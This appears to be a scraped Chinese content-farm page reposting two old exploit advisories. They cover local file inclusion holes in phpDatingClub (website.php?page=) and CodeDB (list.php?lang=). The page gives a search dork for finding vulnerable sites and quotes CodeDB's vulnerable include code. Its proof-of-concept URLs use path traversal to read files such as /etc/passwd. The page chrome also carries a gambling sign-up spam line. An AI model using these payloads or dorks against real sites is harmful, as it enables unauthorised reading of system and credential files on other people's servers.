51阅读吧 - 为您打造专业优质的文章分享平台!
您的当前位置: 51阅读吧 >

申请注册送体验金

NO.1 phpDatingClub (website.php page) Local File Inclusion Vulnerability

#########################################################
#
# phpDatingClub Local File Include Vulnerability
#========================================================
# =
# Author: Big Ben =
# =
#========================================================
#
# script : http://www.w2b.ru/download/phpDatingClub.zip
#
# DorK : Powered by phpDatingClub
#
##########################################################
#
# Exploit:
#
# www.[target].com/Script/website.php?page=[LFI]
#
##########################################################

NO.2 CodeDB (list.php lang) Local File Inclusion Vulnerability

###############################################################################
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################

Source :

// list.php

2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol

7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension
8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d


Proof of Concept :

http://[host]/[codeDB_path]/list.php?lang=../readme.txt
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd
http://[host]/[codeDB_path]/list.php?lang=../[local_file]


EoF.
上一篇:余忆年少时住西湖|忆西湖 上一篇:废物利用手工制作|废物利用手工制作:废弃光盘制作CD架
与该文相关的文章

温馨提示:如果您对51阅读吧有任何建议,请通过网站联系邮箱向我们反馈,感谢各位的建议与支持!